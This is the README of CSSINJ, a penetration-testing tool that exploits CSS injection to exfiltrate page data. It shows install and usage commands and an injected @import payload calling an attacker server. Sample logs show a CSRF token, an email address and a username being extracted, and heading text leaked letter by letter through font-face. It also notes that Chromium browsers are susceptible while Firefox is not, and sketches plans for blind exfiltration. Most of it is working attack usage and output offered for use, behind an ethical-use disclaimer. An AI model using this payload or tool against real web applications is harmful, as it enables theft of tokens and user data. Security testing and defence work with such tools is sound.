_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.
To install CSSINJ, run the following command:
pip install cssinjNow youβre ready to use CSSINJ!
python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]| Option | Description |
|---|---|
-h, --help |
Show help message and exit |
-H, --hostname |
Attacker hostname or IP address |
-p, --port |
Port number of the attacker |
-e, --element |
HTML element to extract specific data |
-a, --attribut |
Specify an element Attribute Selector for exfiltration |
-d, --details |
Show detailed logs of the exfiltration process, including extracted data |
-m, --method |
Specify the type of exfiltration (recursive or font-face) |
-t, --timeout |
Timeout in seconds before considering exfiltration complete (default: 3.0) |
-o, --output |
File to store the exfiltrated data in JSON format |
<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
@import url('//localhost:5005/start');
</style>
...~ python3 -m cssinj inject -H 127.0.0.1 -p 5005 -e input
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-03-11 03:06:49] π οΈ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] π Connection from ::1
[2025-03-11 03:06:49] βοΈ ID : 1
[2025-03-11 03:06:49] β
[1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49] β
[1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49] β
[1] - The value exfiltrated from input is : admin~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e * -a src
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-03-11 03:06:49] π οΈ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] π Connection from ::1
[2025-03-11 03:06:49] βοΈ ID : 1
[2025-03-11 03:06:49] β
[1] - The src exfiltrated from * is : XXXXXXXXXXX.XX~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
_____ _____ _____ _____ _ _ _ _____ __ __
/ ____| / ____| / ____||_ _|| \ | | | | | __ \ \ \ / /
| | | (___ | (___ | | | \| | | | | |__) | \ \_/ /
| | \___ \ \___ \ | | | . ` | _ | | | ___/ \ /
| |____ ____) | ____) | _| |_ | |\ || |__| | _ | | | |
\_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_| |_|
[2025-05-21 03:06:49] π οΈ Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] π Connection from 127.0.0.1
[2025-05-21 03:06:49] βοΈ ID : 1
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 :
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] π [1] - Exfiltrating element 0 : !The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:
-
Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.
-
Firefox, however, handles @import differently:
- Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
- As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
- This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.
This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.
-
General :
- Add error Handler
- File error Handler
- Add test
- Edit Terminal
- Add error Handler
-
Injection :
- Add timeout for font-face exfiltration
-
Complete Exfiltration (Blind):
- 0. Complete dom objects
- 1. Get Structure of the HTML (Tags)
- 2. Get all Attributs for each Element
- 3. Get all value for each Attributs
- 4. Get text using font-face exfiltration
This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.
CSSINJ was developed by DonAsako.